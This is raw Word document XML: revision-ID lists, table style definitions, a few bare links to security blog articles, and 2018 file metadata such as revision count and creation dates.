    <w:rsid w:val="00870BFF"/>
    <w:rsid w:val="00875A41"/>
    <w:rsid w:val="00875F1E"/>
    <w:rsid w:val="00880AF0"/>
    <w:rsid w:val="00882D77"/>
    <w:rsid w:val="00887599"/>
    <w:rsid w:val="00893C69"/>
    <w:rsid w:val="00895D16"/>
    <w:rsid w:val="00896D3D"/>
    <w:rsid w:val="008A6DE3"/>
    <w:rsid w:val="008A70AE"/>
    <w:rsid w:val="008B0FBE"/>
    <w:rsid w:val="008B625A"/>
    <w:rsid w:val="008C4CC0"/>
    <w:rsid w:val="008D7282"/>
    <w:rsid w:val="008E16D8"/>
    <w:rsid w:val="008E2556"/>
    <w:rsid w:val="008E42FB"/>
    <w:rsid w:val="008E560C"/>
    <w:rsid w:val="008E7C58"/>
    <w:rsid w:val="008F04D5"/>
    <w:rsid w:val="008F07FE"/>
    <w:rsid w:val="008F1AF7"/>
    <w:rsid w:val="008F684D"/>
    <w:rsid w:val="008F72C0"/>
    <w:rsid w:val="0090269E"/>
    <w:rsid w:val="00903603"/>
    <w:rsid w:val="009059A0"/>
    <w:rsid w:val="0091061E"/>
    <w:rsid w:val="00915B38"/>
    <w:rsid w:val="009202AC"/>
    <w:rsid w:val="0092033D"/>
    <w:rsid w:val="009219CF"/>
    <w:rsid w:val="00924D23"/>
    <w:rsid w:val="00926998"/>
    <w:rsid w:val="009275E7"/>
    <w:rsid w:val="009329B2"/>
    <w:rsid w:val="009341A5"/>
    <w:rsid w:val="0093508C"/>
    <w:rsid w:val="00940262"/>
    <w:rsid w:val="0094113C"/>
    <w:rsid w:val="00943B2C"/>
    <w:rsid w:val="00944F3B"/>
    <w:rsid w:val="009458B7"/>
    <w:rsid w:val="009461BE"/>
    <w:rsid w:val="00950801"/>
    <w:rsid w:val="00952681"/>
    <w:rsid w:val="009533EB"/>
    <w:rsid w:val="0096324A"/>
    <w:rsid w:val="00965DB6"/>
    <w:rsid w:val="009671E5"/>
    <w:rsid w:val="00970231"/>
    <w:rsid w:val="00970E2A"/>
    <w:rsid w:val="00973BD3"/>
    <w:rsid w:val="009743E0"/>
    <w:rsid w:val="00982D0C"/>
    <w:rsid w:val="009860B0"/>
    <w:rsid w:val="00986F5F"/>
    <w:rsid w:val="009900D9"/>
    <w:rsid w:val="00992CB9"/>
    <w:rsid w:val="00994705"/>
    <w:rsid w:val="009958CD"/>
    <w:rsid w:val="00996C7B"/>
    <w:rsid w:val="00996E72"/>
    <w:rsid w:val="009A4604"/>
    <w:rsid w:val="009B3707"/>
    <w:rsid w:val="009B3818"/>
    <w:rsid w:val="009B421A"/>
    <w:rsid w:val="009C335E"/>
    <w:rsid w:val="009C352C"/>
    <w:rsid w:val="009D5E3D"/>
    <w:rsid w:val="009E1B1A"/>
    <w:rsid w:val="009E6B46"/>
    <w:rsid w:val="009F3E27"/>
    <w:rsid w:val="009F4492"/>
    <w:rsid w:val="009F486B"/>
    <w:rsid w:val="009F71F9"/>
    <w:rsid w:val="00A01230"/>
    <w:rsid w:val="00A02EE4"/>
    <w:rsid w:val="00A052AC"/>
    <w:rsid w:val="00A14179"/>
    <w:rsid w:val="00A14653"/>
    <w:rsid w:val="00A15D39"/>
    <w:rsid w:val="00A23A2C"/>
    <w:rsid w:val="00A41C46"/>
    <w:rsid w:val="00A42E15"/>
    <w:rsid w:val="00A438EA"/>
    <w:rsid w:val="00A4469B"/>
    <w:rsid w:val="00A4530C"/>
    <w:rsid w:val="00A47875"/>
    <w:rsid w:val="00A52B78"/>
    <w:rsid w:val="00A55778"/>
    <w:rsid w:val="00A56FDF"/>
    <w:rsid w:val="00A63269"/>
    <w:rsid w:val="00A701AF"/>
    <w:rsid w:val="00A75185"/>
    <w:rsid w:val="00A75B97"/>
    <w:rsid w:val="00A81FDB"/>
    <w:rsid w:val="00A90081"/>
    <w:rsid w:val="00A9748D"/>
    <w:rsid w:val="00A97969"/>
    <w:rsid w:val="00AA34E6"/>
    <w:rsid w:val="00AB0166"/>
    <w:rsid w:val="00AB20DD"/>
    <w:rsid w:val="00AB2866"/>
    <w:rsid w:val="00AB7F1F"/>
    <w:rsid w:val="00AC2D5B"/>
    <w:rsid w:val="00AC6C7A"/>
    <w:rsid w:val="00AC77C6"/>
    <w:rsid w:val="00AD46F8"/>
    <w:rsid w:val="00AD7576"/>
    <w:rsid w:val="00AE231A"/>
    <w:rsid w:val="00AE32A4"/>
    <w:rsid w:val="00AE7924"/>
    <w:rsid w:val="00AF0952"/>
    <w:rsid w:val="00AF2D71"/>
    <w:rsid w:val="00AF638C"/>
    <w:rsid w:val="00B00177"/>
    <w:rsid w:val="00B006F9"/>
    <w:rsid w:val="00B1193D"/>
    <w:rsid w:val="00B140C9"/>
    <w:rsid w:val="00B14B93"/>
    <w:rsid w:val="00B16508"/>
    <w:rsid w:val="00B17416"/>
    <w:rsid w:val="00B258F8"/>
    <w:rsid w:val="00B35AAD"/>
    <w:rsid w:val="00B405F5"/>
    <w:rsid w:val="00B438FB"/>
    <w:rsid w:val="00B55E42"/>
    <w:rsid w:val="00B56D21"/>
    <w:rsid w:val="00B65F7F"/>
    <w:rsid w:val="00B67747"/>
    <w:rsid w:val="00B70EFD"/>
    <w:rsid w:val="00B717F5"/>
    <w:rsid w:val="00B71EDB"/>
    <w:rsid w:val="00B732C7"/>
    <w:rsid w:val="00B75E67"/>
    <w:rsid w:val="00B76488"/>
    <w:rsid w:val="00B85C60"/>
    <w:rsid w:val="00B922BD"/>
    <w:rsid w:val="00B93422"/>
    <w:rsid w:val="00B94921"/>
    <w:rsid w:val="00B95FE2"/>
    <w:rsid w:val="00B967E5"/>
    <w:rsid w:val="00BA09C7"/>
    <w:rsid w:val="00BA2CF4"/>
    <w:rsid w:val="00BA374F"/>
    <w:rsid w:val="00BA481C"/>
    <w:rsid w:val="00BA75C9"/>
    <w:rsid w:val="00BB037C"/>
    <w:rsid w:val="00BB3ABA"/>
    <w:rsid w:val="00BB63B5"/>
    <w:rsid w:val="00BB6451"/>
    <w:rsid w:val="00BB736C"/>
    <w:rsid w:val="00BB7A15"/>
    <w:rsid w:val="00BC0F69"/>
    <w:rsid w:val="00BC25B6"/>
    <w:rsid w:val="00BC6CC2"/>
    <w:rsid w:val="00BC782C"/>
    <w:rsid w:val="00BD4F1F"/>
    <w:rsid w:val="00BD5CA7"/>
    <w:rsid w:val="00BD5D5F"/>
    <w:rsid w:val="00BE206D"/>
    <w:rsid w:val="00BE5FAA"/>
    <w:rsid w:val="00BE760C"/>
    <w:rsid w:val="00BF1BC0"/>
    <w:rsid w:val="00C01262"/>
    <w:rsid w:val="00C01495"/>
    <w:rsid w:val="00C0379B"/>
    <w:rsid w:val="00C03FAE"/>
    <w:rsid w:val="00C12BA8"/>
    <w:rsid w:val="00C14C02"/>
    <w:rsid w:val="00C17D5C"/>
    <w:rsid w:val="00C2635F"/>
    <w:rsid w:val="00C32B28"/>
    <w:rsid w:val="00C33B85"/>
    <w:rsid w:val="00C4110A"/>
    <w:rsid w:val="00C42D56"/>
    <w:rsid w:val="00C4692C"/>
    <w:rsid w:val="00C46B8B"/>
    <w:rsid w:val="00C52DF6"/>
    <w:rsid w:val="00C66F18"/>
    <w:rsid w:val="00C67919"/>
    <w:rsid w:val="00C67AA0"/>
    <w:rsid w:val="00C75CE9"/>
    <w:rsid w:val="00C805C3"/>
    <w:rsid w:val="00C80750"/>
    <w:rsid w:val="00C91823"/>
    <w:rsid w:val="00C9384B"/>
    <w:rsid w:val="00C96567"/>
    <w:rsid w:val="00CA0BE2"/>
    <w:rsid w:val="00CA1700"/>
    <w:rsid w:val="00CA3CD6"/>
    <w:rsid w:val="00CA5C8A"/>
    <w:rsid w:val="00CA76EC"/>
    <w:rsid w:val="00CA7ADC"/>
    <w:rsid w:val="00CB2253"/>
    <w:rsid w:val="00CC7A79"/>
    <w:rsid w:val="00CD01C4"/>
    <w:rsid w:val="00CD3AAB"/>
    <w:rsid w:val="00CE4691"/>
    <w:rsid w:val="00CE5280"/>
    <w:rsid w:val="00CE7033"/>
    <w:rsid w:val="00CE7DA2"/>
    <w:rsid w:val="00CF0408"/>
    <w:rsid w:val="00CF0A91"/>
    <w:rsid w:val="00CF6529"/>
    <w:rsid w:val="00CF7919"/>
    <w:rsid w:val="00D0104D"/>
    <w:rsid w:val="00D0563B"/>
    <w:rsid w:val="00D0746C"/>
    <w:rsid w:val="00D111CE"/>
    <w:rsid w:val="00D14921"/>
    <w:rsid w:val="00D16B82"/>
    <w:rsid w:val="00D238EA"/>
    <w:rsid w:val="00D24F4D"/>
    <w:rsid w:val="00D256DF"/>
    <w:rsid w:val="00D3272F"/>
    <w:rsid w:val="00D3333E"/>
    <w:rsid w:val="00D33C19"/>
    <w:rsid w:val="00D33D3D"/>
    <w:rsid w:val="00D355BB"/>
    <w:rsid w:val="00D36FE8"/>
    <w:rsid w:val="00D40627"/>
    <w:rsid w:val="00D42822"/>
    <w:rsid w:val="00D44A45"/>
    <w:rsid w:val="00D45307"/>
    <w:rsid w:val="00D46DF8"/>
    <w:rsid w:val="00D507E3"/>
    <w:rsid w:val="00D5097A"/>
    <w:rsid w:val="00D610C0"/>
    <w:rsid w:val="00D62817"/>
    <w:rsid w:val="00D67108"/>
    <w:rsid w:val="00D70F63"/>
    <w:rsid w:val="00D7587A"/>
    <w:rsid w:val="00D759DF"/>
    <w:rsid w:val="00D76919"/>
    <w:rsid w:val="00D81A4E"/>
    <w:rsid w:val="00D82D16"/>
    <w:rsid w:val="00D91686"/>
    <w:rsid w:val="00D919B7"/>
    <w:rsid w:val="00D92317"/>
    <w:rsid w:val="00D95598"/>
    <w:rsid w:val="00D96F15"/>
    <w:rsid w:val="00DA1D00"/>
    <w:rsid w:val="00DA3F20"/>
    <w:rsid w:val="00DB28CE"/>
    <w:rsid w:val="00DB321E"/>
    <w:rsid w:val="00DB425F"/>
    <w:rsid w:val="00DC2C7E"/>
    <w:rsid w:val="00DF0119"/>
    <w:rsid w:val="00E03A53"/>
    <w:rsid w:val="00E03FC0"/>
    <w:rsid w:val="00E178E3"/>
    <w:rsid w:val="00E22CF0"/>
    <w:rsid w:val="00E266B3"/>
    <w:rsid w:val="00E26E2C"/>
    <w:rsid w:val="00E3646D"/>
    <w:rsid w:val="00E3713B"/>
    <w:rsid w:val="00E37674"/>
    <w:rsid w:val="00E405FE"/>
    <w:rsid w:val="00E40652"/>
    <w:rsid w:val="00E4405B"/>
    <w:rsid w:val="00E46263"/>
    <w:rsid w:val="00E50ED4"/>
    <w:rsid w:val="00E51A67"/>
    <w:rsid w:val="00E55F27"/>
    <w:rsid w:val="00E56F5B"/>
    <w:rsid w:val="00E571B0"/>
    <w:rsid w:val="00E60621"/>
    <w:rsid w:val="00E60C3E"/>
    <w:rsid w:val="00E61356"/>
    <w:rsid w:val="00E634D0"/>
    <w:rsid w:val="00E6753E"/>
    <w:rsid w:val="00E7094E"/>
    <w:rsid w:val="00E710D7"/>
    <w:rsid w:val="00E80F57"/>
    <w:rsid w:val="00E86D6C"/>
    <w:rsid w:val="00E87E3C"/>
    <w:rsid w:val="00E92465"/>
    <w:rsid w:val="00E95E27"/>
    <w:rsid w:val="00EA1369"/>
    <w:rsid w:val="00EA1783"/>
    <w:rsid w:val="00EA202D"/>
    <w:rsid w:val="00EA4E85"/>
    <w:rsid w:val="00EB0DC2"/>
    <w:rsid w:val="00EB1424"/>
    <w:rsid w:val="00EB22CF"/>
    <w:rsid w:val="00EB649C"/>
    <w:rsid w:val="00EC0D97"/>
    <w:rsid w:val="00EC3ACD"/>
    <w:rsid w:val="00EC664B"/>
    <w:rsid w:val="00EC6B17"/>
    <w:rsid w:val="00ED3FED"/>
    <w:rsid w:val="00ED4998"/>
    <w:rsid w:val="00ED6D7D"/>
    <w:rsid w:val="00EE134F"/>
    <w:rsid w:val="00EF2C35"/>
    <w:rsid w:val="00EF63F5"/>
    <w:rsid w:val="00EF6517"/>
    <w:rsid w:val="00F0077C"/>
    <w:rsid w:val="00F024A4"/>
    <w:rsid w:val="00F05EED"/>
    <w:rsid w:val="00F11776"/>
    <w:rsid w:val="00F14A96"/>
    <w:rsid w:val="00F16208"/>
    <w:rsid w:val="00F1755B"/>
    <w:rsid w:val="00F23DDF"/>
    <w:rsid w:val="00F25D57"/>
    <w:rsid w:val="00F32004"/>
    <w:rsid w:val="00F34F53"/>
    <w:rsid w:val="00F35CB5"/>
    <w:rsid w:val="00F40884"/>
    <w:rsid w:val="00F41E03"/>
    <w:rsid w:val="00F42B9F"/>
    <w:rsid w:val="00F542F7"/>
    <w:rsid w:val="00F56622"/>
    <w:rsid w:val="00F56DCA"/>
    <w:rsid w:val="00F57076"/>
    <w:rsid w:val="00F578C7"/>
    <w:rsid w:val="00F709A9"/>
    <w:rsid w:val="00F7104D"/>
    <w:rsid w:val="00F713F3"/>
    <w:rsid w:val="00F7159E"/>
    <w:rsid w:val="00F73EA5"/>
    <w:rsid w:val="00F759FF"/>
    <w:rsid w:val="00F81EBE"/>
    <w:rsid w:val="00F84150"/>
    <w:rsid w:val="00F85EAA"/>
    <w:rsid w:val="00F86504"/>
    <w:rsid w:val="00F95217"/>
    <w:rsid w:val="00FA4F5D"/>
    <w:rsid w:val="00FA54CC"/>
    <w:rsid w:val="00FB0F51"/>
    <w:rsid w:val="00FB1F03"/>
    <w:rsid w:val="00FB3F9C"/>
    <w:rsid w:val="00FB5B0A"/>
    <w:rsid w:val="00FB7D14"/>
    <w:rsid w:val="00FC1079"/>
    <w:rsid w:val="00FD1B62"/>
    <w:rsid w:val="00FE23F3"/>
    <w:rsid w:val="00FE3132"/>
    <w:rsid w:val="00FE3CDB"/>
    <w:rsid w:val="00FE5281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ECAA9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{566169AF-A067-487E-A52A-D456ADF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C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545C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4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45C3"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="008F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6504"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="PlainTable1">
    <w:name w:val="Plain Table 1"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="41"/>
    <w:rsid w:val="00001C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A0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73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1C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5404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891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37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j4s0nh4ck.iteye.com/blog/215100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log.csdn.net/SKI_12/article/details/56279676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freebuf.com/articles/web/120747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6CF89-11A7-2443-9520-AD9FEF06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g9703@gmail.com</cp:lastModifiedBy>
  <cp:revision>448</cp:revision>
  <cp:lastPrinted>2018-10-08T09:19:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-10-08T09:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-12-10T16:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>